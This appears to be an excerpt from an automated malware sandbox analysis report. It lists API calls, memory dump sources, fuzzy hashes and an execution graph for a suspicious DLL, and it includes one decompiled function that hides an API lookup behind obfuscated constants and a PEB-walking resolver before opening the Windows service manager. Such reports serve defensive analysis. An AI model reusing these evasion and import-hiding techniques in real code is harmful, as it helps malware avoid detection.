                                                                                                                                    • EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                                    • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                                    • LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3253506028-0
                                                                                                                                    • Opcode ID: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                                    • Instruction ID: 3404b174272e1aedd22e2de365cf3e448d28d784c73140ac4aa41e98356ae93e
                                                                                                                                    • Opcode Fuzzy Hash: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                                    • Instruction Fuzzy Hash: 5AF0907350031A9BDB10DB58FC88B1AB6AAFB96355F870816F64582123EB3264C48A61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206D1
                                                                                                                                    • TlsGetValue.KERNEL32 ref: 100206E6
                                                                                                                                    • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206FC
                                                                                                                                    • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020707
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$Leave$EnterValue
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3969253408-0
                                                                                                                                    • Opcode ID: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                                    • Instruction ID: 186a6cd651b3b82d4df79f5272d157dd9dcdda25cd8a7682fbe975f35e4e1d68
                                                                                                                                    • Opcode Fuzzy Hash: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                                    • Instruction Fuzzy Hash: 51F0FE76604720DFD320CF64DD8880B73ABEB8925135A9555F842D3123E630F8058F61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:15.7%
                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:1080
                                                                                                                                    Total number of Limit Nodes:17
21dcf7 2 API calls 4542->4555 4543 21f426 4543->4111 4548 20a8b0 GetPEB 4548->4555 4550 202b62 GetPEB 4550->4555 4551 218519 GetPEB 4551->4555 4553 209670 GetPEB 4553->4555 4555->4540 4555->4542 4555->4543 4555->4548 4555->4550 4555->4551 4555->4553 4660 21dac6 4555->4660 4664 2088c3 4555->4664 4668 2075fa 4555->4668 4672 21408e 4555->4672 4676 202ae4 4555->4676 4680 2209b5 4555->4680 4683 21a2e8 4555->4683 4558 204836 4556->4558 4559 204b23 4558->4559 4561 207ff2 2 API calls 4558->4561 4562 204b21 4558->4562 4563 21847f 4558->4563 4560 21847f GetPEB 4559->4560 4560->4562 4561->4558 4562->4494 4564 2184a6 4563->4564 4565 21aa30 GetPEB 4564->4565 4566 218502 4565->4566 4566->4558 4568 21861f 4567->4568 4569 207ff2 2 API calls 4568->4569 4570 2186bc 4569->4570 4570->4515 4570->4570 4572 21c0e6 4571->4572 4573 20a42d GetPEB 4572->4573 4574 21c108 4573->4574 4574->4515 4576 20ed97 4575->4576 4583 217a71 4576->4583 4580 207f39 4579->4580 4581 20a42d GetPEB 4580->4581 4582 207f55 4581->4582 4582->4511 4584 217a8a 4583->4584 4585 21aa30 GetPEB 4584->4585 4586 20ee00 4585->4586 4586->4515 4589 207764 4587->4589 4588 207ff2 2 API calls 4588->4589 4589->4588 4590 207a10 4589->4590 4591 2079f3 4589->4591 4592 220e3a GetPEB 4589->4592 4590->4529 4620 220e3a 4591->4620 4592->4589 4595 207e9a 4594->4595 4596 20ed7e GetPEB 4595->4596 4597 207f16 4596->4597 4597->4529 4612 21aea5 4598->4612 4601 21baf7 4602 20957d GetPEB 4601->4602 4605 21baf5 4602->4605 4603 207ff2 2 API calls 4603->4612 4605->4529 4607 21dcf7 RtlAllocateHeap GetPEB 4607->4612 4608 209462 GetPEB 4608->4612 4609 218519 GetPEB 4609->4612 4611 20a8b0 GetPEB 4611->4612 4612->4601 4612->4603 4612->4605 4612->4607 4612->4608 4612->4609 4612->4611 4624 220b68 4612->4624 4628 217b05 4612->4628 4632 216bc6 4612->4632 4636 20a81d 4612->4636 4640 21828a 4612->4640 4616 2070dc 4613->4616 4614 2074bb 4614->4529 4615 215b3b GetPEB 4615->4616 4616->4614 4616->4615 4617 207ff2 2 API calls 4616->4617 4618 2074a7 4616->4618 
4617->4616 4619 218519 GetPEB 4618->4619 4619->4614 4621 220e58 4620->4621 4622 20ed7e GetPEB 4621->4622 4623 220f24 4622->4623 4623->4590 4625 220b97 4624->4625 4626 21aa30 GetPEB 4625->4626 4627 220bfc 4626->4627 4627->4612 4629 217b37 4628->4629 4630 21aa30 GetPEB 4629->4630 4631 217b8a 4630->4631 4631->4612 4633 216bda 4632->4633 4634 21aa30 GetPEB 4633->4634 4635 216c3d 4634->4635 4635->4612 4637 20a83f 4636->4637 4638 21aa30 GetPEB 4637->4638 4639 20a89d 4638->4639 4639->4612 4641 2182a9 4640->4641 4642 21aa30 GetPEB 4641->4642 4643 218300 4642->4643 4643->4612 4646 205e82 4644->4646 4645 218519 GetPEB 4645->4646 4646->4645 4647 2064bd 4646->4647 4648 207ff2 2 API calls 4646->4648 4649 20ca90 GetPEB 4646->4649 4647->4537 4648->4646 4649->4646 4652 20af1c 4650->4652 4651 21ae6d 2 API calls 4651->4652 4652->4651 4653 20b0b3 4652->4653 4654 20b0e8 4652->4654 4656 21e274 4653->4656 4654->4537 4657 21e2a0 4656->4657 4658 21aa30 GetPEB 4657->4658 4659 21e312 4658->4659 4659->4654 4661 21dae5 4660->4661 4662 21aa30 GetPEB 4661->4662 4663 21db32 4662->4663 4663->4555 4665 2088f5 4664->4665 4666 21aa30 GetPEB 4665->4666 4667 208950 4666->4667 4667->4555 4669 20762c 4668->4669 4670 21aa30 GetPEB 4669->4670 4671 207690 4670->4671 4671->4555 4673 2140b3 4672->4673 4674 21aa30 GetPEB 4673->4674 4675 214103 4674->4675 4675->4555 4677 202b04 4676->4677 4678 21aa30 GetPEB 4677->4678 4679 202b4b 4678->4679 4679->4555 4696 2094ee 4680->4696 4689 21a519 4683->4689 4684 207ff2 RtlAllocateHeap GetPEB 4684->4689 4686 21a634 4687 21a64a 4686->4687 4688 218519 GetPEB 4686->4688 4687->4555 4688->4687 4689->4684 4689->4686 4690 20ed7e GetPEB 4689->4690 4691 218519 GetPEB 4689->4691 4700 21c032 4689->4700 4690->4689 4691->4689 4693 202b77 4692->4693 4694 21aa30 GetPEB 4693->4694 4695 202bce 4694->4695 4695->4543 4697 209511 4696->4697 4698 21aa30 GetPEB 4697->4698 4699 209566 4698->4699 4699->4555 4701 21c054 4700->4701 4702 21aa30 GetPEB 4701->4702 4703 21c0ae 4702->4703 4703->4689 
4705 20e262 4704->4705 4706 21aa30 GetPEB 4705->4706 4707 20e2c1 4706->4707 4707->4118 4709 209623 4708->4709 4726 218315 4709->4726 4714 2211d1 4712->4714 4713 21dcf7 2 API calls 4713->4714 4714->4713 4715 211652 GetPEB 4714->4715 4716 207ff2 2 API calls 4714->4716 4717 221380 4714->4717 4718 20a8b0 GetPEB 4714->4718 4720 221391 4714->4720 4813 217ba6 4714->4813 4715->4714 4716->4714 4721 218519 GetPEB 4717->4721 4718->4714 4720->4128 4721->4720 4723 2092c1 4722->4723 4724 2092ac 4722->4724 4723->4128 4724->4723 4725 218519 GetPEB 4724->4725 4725->4724 4730 21832d 4726->4730 4728 21845c 4731 218519 GetPEB 4728->4731 4730->4728 4732 20966a 4730->4732 4733 207ff2 2 API calls 4730->4733 4735 20bb7e 4730->4735 4752 204bc7 4730->4752 4757 21907f 4730->4757 4731->4732 4732->4128 4733->4730 4741 20c63d 4735->4741 4739 20ca5b 4742 20957d GetPEB 4739->4742 4740 20a958 GetPEB 4740->4741 4741->4739 4741->4740 4743 21dcf7 RtlAllocateHeap GetPEB 4741->4743 4744 20ca59 4741->4744 4747 209462 GetPEB 4741->4747 4750 20ed7e GetPEB 4741->4750 4751 20a8b0 GetPEB 4741->4751 4766 20aa4d 4741->4766 4770 20b144 4741->4770 4774 201c45 4741->4774 4778 214624 4741->4778 4782 2092c7 4741->4782 4786 21ca69 4741->4786 4790 202bd9 4741->4790 4742->4744 4743->4741 4744->4730 4747->4741 4750->4741 4751->4741 4753 21ca69 GetPEB 4752->4753 4754 204c44 4753->4754 4755 218519 GetPEB 4754->4755 4756 204c57 4755->4756 4756->4730 4764 21947b 4757->4764 4758 2195cb 4759 20957d GetPEB 4758->4759 4761 2195c9 4759->4761 4760 20aa4d GetPEB 4760->4764 4761->4730 4762 21dcf7 RtlAllocateHeap GetPEB 4762->4764 4763 209462 GetPEB 4763->4764 4764->4758 4764->4760 4764->4761 4764->4762 4764->4763 4765 20a8b0 GetPEB 4764->4765 4765->4764 4767 20aa76 4766->4767 4768 21aa30 GetPEB 4767->4768 4769 20aab9 4768->4769 4769->4741 4771 20b15f 4770->4771 4772 21aa30 GetPEB 4771->4772 4773 20b1b8 4772->4773 4773->4741 4775 201c76 4774->4775 4776 21aa30 GetPEB 4775->4776 4777 201cd0 4776->4777 4777->4741 4779 214646 
4778->4779 4780 21aa30 GetPEB 4779->4780 4781 2146a8 4780->4781 4781->4741 4783 2092e5 4782->4783 4784 21aa30 GetPEB 4783->4784 4785 20933c 4784->4785 4785->4741 4787 21ca7b 4786->4787 4788 21aa30 GetPEB 4787->4788 4789 21cad4 4788->4789 4789->4741 4793 203757 4790->4793 4791 218519 GetPEB 4791->4793 4792 203a7d 4795 20957d GetPEB 4792->4795 4793->4791 4793->4792 4794 207ff2 2 API calls 4793->4794 4796 203bbb 4793->4796 4798 209462 GetPEB 4793->4798 4799 21dcf7 RtlAllocateHeap GetPEB 4793->4799 4800 20cb52 GetPEB 4793->4800 4803 220b68 GetPEB 4793->4803 4804 20a8b0 GetPEB 4793->4804 4805 21d84c 4793->4805 4809 208d13 4793->4809 4794->4793 4797 203aa2 4795->4797 4796->4796 4797->4741 4798->4793 4799->4793 4800->4793 4803->4793 4804->4793 4806 21d87f 4805->4806 4807 21aa30 GetPEB 4806->4807 4808 21d8ca 4807->4808 4808->4793 4810 208d41 4809->4810 4811 21aa30 GetPEB 4810->4811 4812 208da7 4811->4812 4812->4793 4814 217bbf 4813->4814 4815 207ff2 2 API calls 4814->4815 4816 217c88 4815->4816 4816->4714 4816->4816 4818 20f02e 4817->4818 4819 21aa30 GetPEB 4818->4819 4820 20f082 4819->4820 4820->4138 4822 20ab09 4821->4822 4823 21aa30 GetPEB 4822->4823 4824 20ab6d 4823->4824 4824->4138 4826 201fe3 4825->4826 4827 21aa30 GetPEB 4826->4827 4828 202045 4827->4828 4828->4138 4830 21aa30 GetPEB 4829->4830 4831 215cbb 4830->4831 4831->4152 4833 214567 4832->4833 4834 20a42d GetPEB 4833->4834 4835 214587 4834->4835 4835->4152 4841 210d2c 4836->4841 4837 210da3 4837->4163 4838 208dc4 GetPEB 4838->4841 4839 218519 GetPEB 4839->4841 4841->4837 4841->4838 4841->4839 4842 211e67 2 API calls 4841->4842 4936 219e56 4841->4936 4842->4841 4853 21144a 4843->4853 4844 2146bb 2 API calls 4844->4853 4845 211647 4845->4163 4846 21da22 GetPEB 4846->4853 4849 20a8b0 GetPEB 4849->4853 4850 21dcf7 RtlAllocateHeap GetPEB 4850->4853 4852 2047ce GetPEB 4852->4853 4853->4844 4853->4845 4853->4846 4853->4849 4853->4850 4853->4852 4944 20b6cf 4853->4944 4948 208969 4853->4948 4952 20ea99 4853->4952 
4959 20ab87 4853->4959 4856 217703 4855->4856 4858 21d2ce GetPEB 4856->4858 4861 217759 4856->4861 4862 21da22 GetPEB 4856->4862 4864 211e67 CloseHandle GetPEB 4856->4864 4865 2177d7 4856->4865 4867 20b6cf GetPEB 4856->4867 4869 208969 GetPEB 4856->4869 4871 21dcf7 2 API calls 4856->4871 4873 2047ce GetPEB 4856->4873 4874 20a8b0 GetPEB 4856->4874 4875 20ea99 3 API calls 4856->4875 4977 21bb23 4856->4977 4984 203de2 4856->4984 4987 21d389 4856->4987 4858->4856 4863 20ab87 3 API calls 4861->4863 4862->4856 4866 217789 4863->4866 4864->4856 4865->4163 4866->4865 4868 211e67 2 API calls 4866->4868 4867->4856 4870 2177b2 4868->4870 4869->4856 4872 211e67 2 API calls 4870->4872 4871->4856 4872->4865 4873->4856 4874->4856 4875->4856 5017 217cdb 4876->5017 4878 21570e 4879 20ab87 3 API calls 4878->4879 4880 218519 GetPEB 4878->4880 4881 215b08 4878->4881 4882 204816 2 API calls 4878->4882 4883 2146bb 2 API calls 4878->4883 4885 215b06 4878->4885 4886 21da22 GetPEB 4878->4886 4888 20cb52 GetPEB 4878->4888 4889 20b6cf GetPEB 4878->4889 4890 21dcf7 RtlAllocateHeap GetPEB 4878->4890 4892 208969 GetPEB 4878->4892 4893 21453f GetPEB 4878->4893 4894 20a8b0 GetPEB 4878->4894 4895 2047ce GetPEB 4878->4895 4896 20ea99 3 API calls 4878->4896 5020 21dedc 4878->5020 5026 218727 4878->5026 4879->4878 4880->4878 4884 211e67 2 API calls 4881->4884 4882->4878 4883->4878 4884->4885 4885->4163 4886->4878 4888->4878 4889->4878 4890->4878 4892->4878 4893->4878 4894->4878 4895->4878 4896->4878 4907 20f696 4897->4907 4898 2146bb 2 API calls 4898->4907 4899 20f88f 4899->4163 4900 21da22 GetPEB 4900->4907 4901 20b6cf GetPEB 4901->4907 4902 20a8b0 GetPEB 4902->4907 4903 208969 GetPEB 4903->4907 4904 20ab87 3 API calls 4904->4907 4905 21dcf7 RtlAllocateHeap GetPEB 4905->4907 4906 2047ce GetPEB 4906->4907 4907->4898 4907->4899 4907->4900 4907->4901 4907->4902 4907->4903 4907->4904 4907->4905 4907->4906 4908 20ea99 3 API calls 4907->4908 4908->4907 4910 209a55 4909->4910 4911 209b65 4910->4911 4915 
209b63 4910->4915 5030 2046be 4910->5030 5034 21c3a0 4910->5034 5042 207c37 4910->5042 4913 219e56 GetPEB 4911->4913 4913->4915 4915->4163 4923 211c8c 4917->4923 4918 20ab87 3 API calls 4918->4923 4919 21da22 GetPEB 4919->4923 4920 211dd2 4920->4163 4921 20b6cf GetPEB 4921->4923 4922 208969 GetPEB 4922->4923 4923->4918 4923->4919 4923->4920 4923->4921 4923->4922 4924 21dcf7 2 API calls 4923->4924 4925 2047ce GetPEB 4923->4925 4926 20a8b0 GetPEB 4923->4926 4927 20ea99 3 API calls 4923->4927 4924->4923 4925->4923 4926->4923 4927->4923 4934 20ba53 4928->4934 4929 20bb5e 4929->4163 4930 21c3a0 GetPEB 4930->4934 4931 20bb60 4932 219e56 GetPEB 4931->4932 4932->4929 4933 2046be GetPEB 4933->4934 4934->4929 4934->4930 4934->4931 4934->4933 4935 207c37 GetPEB 4934->4935 4935->4934 4937 219e69 4936->4937 4940 206bf2 4937->4940 4941 206c0c 4940->4941 4942 21aa30 GetPEB 4941->4942 4943 206c8f 4942->4943 4943->4841 4945 20b6e5 4944->4945 4946 21aa30 GetPEB 4945->4946 4947 20b742 4946->4947 4947->4853 4949 208980 4948->4949 4950 21d25e GetPEB 4949->4950 4951 208a5d 4950->4951 4951->4853 4953 20eab9 4952->4953 4954 20ecec 4953->4954 4955 208f65 2 API calls 4953->4955 4956 20ecd6 4953->4956 4969 2019b8 4953->4969 4954->4853 4955->4953 4958 211e67 2 API calls 4956->4958 4958->4954 4960 20abb0 4959->4960 4961 204b61 GetPEB 4960->4961 4962 20ad67 4961->4962 4973 207f5d 4962->4973 4964 20ad99 4965 211e67 2 API calls 4964->4965 4968 20ada4 4964->4968 4966 20adc4 4965->4966 4967 211e67 2 API calls 4966->4967 4967->4968 4968->4853 4970 2019dd 4969->4970 4971 21aa30 GetPEB 4970->4971 4972 201a3f 4971->4972 4972->4953 4974 207f8e 4973->4974 4975 21aa30 GetPEB 4974->4975 4976 207fd4 CreateProcessW 4975->4976 4976->4964 4978 21bb48 4977->4978 4979 211e67 2 API calls 4978->4979 4982 21be1d 4978->4982 4983 203de2 GetPEB 4978->4983 4997 220ac8 4978->4997 5001 21d8ec 4978->5001 4979->4978 4982->4856 4983->4978 4985 21aa30 GetPEB 4984->4985 4986 203e36 4985->4986 4986->4856 4989 21d3c3 4987->4989 
4990 21d82d 4989->4990 4992 21d82b 4989->4992 4993 204b61 GetPEB 4989->4993 4994 21dcf7 2 API calls 4989->4994 4996 20a8b0 GetPEB 4989->4996 5005 21de10 4989->5005 5009 204241 4989->5009 5013 219008 4990->5013 4992->4856 4993->4989 4994->4989 4996->4989 4998 220af2 4997->4998 4999 21aa30 GetPEB 4998->4999 5000 220b4e 4999->5000 5000->4978 5002 21d8ff 5001->5002 5003 21aa30 GetPEB 5002->5003 5004 21d96e 5003->5004 5004->4978 5006 21de56 5005->5006 5007 21aa30 GetPEB 5006->5007 5008 21deba 5007->5008 5008->4989 5010 204257 5009->5010 5011 21aa30 GetPEB 5010->5011 5012 2042b3 5011->5012 5012->4989 5014 21901a 5013->5014 5015 21aa30 GetPEB 5014->5015 5016 219074 5015->5016 5016->4992 5018 21aa30 GetPEB 5017->5018 5019 217d3e 5018->5019 5019->4878 5021 21df09 5020->5021 5022 21e1a5 5021->5022 5023 21e1a3 5021->5023 5025 207ff2 2 API calls 5021->5025 5024 220e3a GetPEB 5022->5024 5023->4878 5024->5023 5025->5021 5027 218758 5026->5027 5028 21aa30 GetPEB 5027->5028 5029 2187b7 5028->5029 5029->4878 5031 2046e5 5030->5031 5032 21aa30 GetPEB 5031->5032 5033 204737 5032->5033 5033->4910 5035 21c3bc 5034->5035 5036 21c627 5035->5036 5047 20a3a3 5035->5047 5036->4910 5039 20ed7e GetPEB 5040 21c5e2 5039->5040 5040->5036 5041 20ed7e GetPEB 5040->5041 5041->5040 5045 207c52 5042->5045 5043 207df1 5043->4910 5044 21cadf GetPEB 5044->5045 5045->5043 5045->5044 5051 206ca0 5045->5051 5048 20a3c0 5047->5048 5049 21aa30 GetPEB 5048->5049 5050 20a41a 5049->5050 5050->5036 5050->5039 5052 206cb8 5051->5052 5053 21aa30 GetPEB 5052->5053 5054 206d15 5053->5054 5054->5045 5056 21aa30 GetPEB 5055->5056 5057 20f8f4 5056->5057 5057->4181 5059 20a9e6 5058->5059 5060 21aa30 GetPEB 5059->5060 5061 20aa3f 5060->5061 5061->4181 5063 208ee7 5062->5063 5064 21aa30 GetPEB 5063->5064 5065 208f54 5064->5065 5065->4181 5068 20435e 5066->5068 5067 207ff2 2 API calls 5067->5068 5068->5067 5069 20ae64 GetPEB 5068->5069 5070 20457c 5068->5070 5071 2045a6 5068->5071 5069->5068 5077 20ae64 5070->5077 
5071->4181 5074 204e8f 5073->5074 5075 21aa30 GetPEB 5074->5075 5076 204ed7 5075->5076 5076->4181 5078 20ae8b 5077->5078 5079 21aa30 GetPEB 5078->5079 5080 20aee2 5079->5080 5080->5071 5083 21001b 5081->5083 5082 218606 2 API calls 5082->5083 5083->5082 5086 21031b 5083->5086 5088 20a8b0 GetPEB 5083->5088 5089 20cd29 5083->5089 5093 20ee81 5083->5093 5098 202206 5083->5098 5086->4188 5088->5083 5090 20cd3f 5089->5090 5091 21aa30 GetPEB 5090->5091 5092 20cd9f 5091->5092 5092->5083 5102 218f15 5093->5102 5097 20eff7 5097->5083 5099 20222a 5098->5099 5100 20a42d GetPEB 5099->5100 5101 202249 5100->5101 5101->5083 5103 218f34 5102->5103 5104 21aa30 GetPEB 5103->5104 5105 20efa8 5104->5105 5105->5097 5106 21db43 5105->5106 5107 21db6c 5106->5107 5108 21aa30 GetPEB 5107->5108 5109 21dbd4 5108->5109 5109->5097 5111 207b13 5110->5111 5112 21aa30 GetPEB 5111->5112 5113 207b7c 5112->5113 5113->4196 5115 218b6f 5114->5115 5116 21aa30 GetPEB 5115->5116 5117 218bd5 5116->5117 5117->3997 5119 209df5 5118->5119 5121 20a305 5119->5121 5123 21dcf7 RtlAllocateHeap GetPEB 5119->5123 5124 20a918 GetPEB 5119->5124 5126 2047ce GetPEB 5119->5126 5127 20a8b0 GetPEB 5119->5127 5128 209dcf 2 API calls 5119->5128 5129 204635 5119->5129 5133 207e00 5119->5133 5137 208abf 5119->5137 5121->4217 5123->5119 5124->5119 5126->5119 5127->5119 5128->5119 5130 20464b 5129->5130 5131 21aa30 GetPEB 5130->5131 5132 2046b0 5131->5132 5132->5119 5134 207e18 5133->5134 5135 21aa30 GetPEB 5134->5135 5136 207e79 5135->5136 5136->5119 5138 208ad1 5137->5138 5139 21aa30 GetPEB 5138->5139 5140 208b32 5139->5140 5140->5119 5152 20e2cc 5141->5152 5145 209ba6 5144->5145 5175 2091dd 5145->5175 5150 211e67 2 API calls 5151 209d26 5150->5151 5151->4226 5155 20e2f1 5152->5155 5157 20e4ef 5155->5157 5159 205357 5155->5159 5161 205988 5155->5161 5164 208e4d 5155->5164 5167 21c15d 5155->5167 5171 202a58 5155->5171 5160 211e67 2 API calls 5157->5160 5159->4226 5160->5159 5162 21aa30 GetPEB 5161->5162 5163 2059db 5162->5163 
5163->5155 5165 215c73 GetPEB 5164->5165 5166 208eb3 5165->5166 5166->5155 5168 21c176 5167->5168 5169 21aa30 GetPEB 5168->5169 5170 21c1de 5169->5170 5170->5155 5172 202a71 5171->5172 5173 21aa30 GetPEB 5172->5173 5174 202ad6 5173->5174 5174->5155 5176 21aa30 GetPEB 5175->5176 5177 20923b 5176->5177 5177->5151 5178 2076aa 5177->5178 5179 2076cd 5178->5179 5180 21aa30 GetPEB 5179->5180 5181 207723 5180->5181 5181->5150 5183 21e365 5182->5183 5184 20a42d GetPEB 5183->5184 5185 21e38d 5184->5185 5185->4236 5191 20410d 5186->5191 5188 20421e 5190 201fd1 GetPEB 5188->5190 5189 21dcf7 2 API calls 5189->5191 5192 20421c 5190->5192 5191->5188 5191->5189 5191->5192 5193 20aad6 GetPEB 5191->5193 5194 20a8b0 GetPEB 5191->5194 5206 201f53 5191->5206 5192->4247 5193->5191 5194->5191 5197 216c65 5195->5197 5196 204b61 GetPEB 5196->5197 5197->5196 5198 216d92 5197->5198 5200 216db0 5197->5200 5214 209d31 5197->5214 5210 216637 5198->5210 5200->4247 5203 20b1db 5202->5203 5204 21aa30 GetPEB 5203->5204 5205 20b231 5204->5205 5205->4259 5207 201f6f 5206->5207 5208 21aa30 GetPEB 5207->5208 5209 201fc3 5208->5209 5209->5191 5211 216659 5210->5211 5212 21aa30 GetPEB 5211->5212 5213 2166b7 5212->5213 5213->5200 5215 209d52 5214->5215 5216 21aa30 GetPEB 5215->5216 5217 209dc1 5216->5217 5217->5197 5218 20e991 5219 20ea8d 5218->5219 5220 20ea62 5218->5220 5224 20f8fd 5220->5224 5223 2093ed 2 API calls 5223->5219 5235 20fde0 5224->5235 5225 20ffd1 5227 20ab87 3 API calls 5225->5227 5226 204b61 GetPEB 5226->5235 5228 20ea75 5227->5228 5228->5219 5228->5223 5229 20f899 GetPEB 5229->5235 5230 2146bb 2 API calls 5230->5235 5231 21da22 GetPEB 5231->5235 5233 21dcf7 RtlAllocateHeap GetPEB 5233->5235 5234 20a8b0 GetPEB 5234->5235 5235->5225 5235->5226 5235->5228 5235->5229 5235->5230 5235->5231 5235->5233 5235->5234 5236 2047ce GetPEB 5235->5236 5237 20b23c 5235->5237 5236->5235 5238 20b254 5237->5238 5239 21aa30 GetPEB 5238->5239 5240 20b2b8 lstrcmpiW 5239->5240 5240->5235 5241 204ee3 5242 
20b6cf GetPEB 5241->5242 5243 205133 5242->5243 5244 20b23c 2 API calls 5243->5244 5245 20514c 5244->5245 5246 21dcf7 2 API calls 5245->5246 5253 2051ad 5245->5253 5247 205167 5246->5247 5248 2047ce GetPEB 5247->5248 5249 20518e 5248->5249 5250 20a8b0 GetPEB 5249->5250 5251 20519b 5250->5251 5252 211f8a 2 API calls 5251->5252 5252->5253 5275 201993 5276 2019dd 5275->5276 5277 21aa30 GetPEB 5276->5277 5278 201a3f 5277->5278 5254 2081b7 5264 208679 5254->5264 5255 218519 GetPEB 5255->5264 5257 208f65 2 API calls 5257->5264 5258 21da22 GetPEB 5258->5264 5259 207ff2 2 API calls 5259->5264 5260 2086e2 5261 20b6cf GetPEB 5261->5264 5262 2086c6 5266 211e67 2 API calls 5262->5266 5263 20b23c 2 API calls 5263->5264 5264->5255 5264->5257 5264->5258 5264->5259 5264->5260 5264->5261 5264->5262 5264->5263 5267 21c264 5264->5267 5271 21458f 5264->5271 5266->5260 5268 21c291 5267->5268 5269 21aa30 GetPEB 5268->5269 5270 21c2dd 5269->5270 5270->5264 5272 2145a2 5271->5272 5273 21aa30 GetPEB 5272->5273 5274 214619 5273->5274 5274->5264 5279 210a96 5281 210aa6 5279->5281 5282 214087 GetPEB 5279->5282 5282->5281 5283 204c5d 5284 204d8d 5283->5284 5285 218606 2 API calls 5284->5285 5290 204dd2 5284->5290 5286 204da8 5285->5286 5291 20cbdf 5286->5291 5289 20a8b0 GetPEB 5289->5290 5293 20cbfb 5291->5293 5292 204dbc 5292->5289 5293->5292 5295 214011 5293->5295 5296 214026 5295->5296 5297 21aa30 GetPEB 5296->5297 5298 214078 5297->5298 5298->5293

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 250 20912c-2091af call 2120b9 call 21aa30 OpenSCManagerW
C-Code - Quality: 54%
E0020912C(int __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
	signed int _v8;
	signed int _v12;
	void* _t24;
	void* _t32;
	signed int _t34;
	int _t43;

	_push(__ecx);
	_push(__ecx);
	_push(_a20);
	_t43 = __ecx;
	_push(_a16);
	_push(0);
	_push(_a8);
	_push(0);
	_push(__ecx);
	E002120B9(_t24);
	_v12 = 0x4657ea;
	_t34 = 0x1b;
	_v12 = _v12 / _t34;
	_v12 = _v12 ^ 0x000ac4f3;
	_v8 = 0xb5c996;
	_v8 = _v8 >> 4;
	_v8 = _v8 * 0x19;
	_v8 = _v8 + 0x3329;
	_v8 = _v8 ^ 0x01161fa0;
	E0021AA30(0x14e, 0x20a9b263, _t34, 0x18e12c58);
	_t32 = OpenSCManagerW(0, 0, _t43); // executed
	return _t32;
}










                                                                                                                                    APIs
                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000B11AB), ref: 002091A8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000A.00000002.523188854.0000000000201000.00000020.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                    • Associated: 0000000A.00000002.523168890.0000000000200000.00000004.00000800.00020000.00000000.sdmp
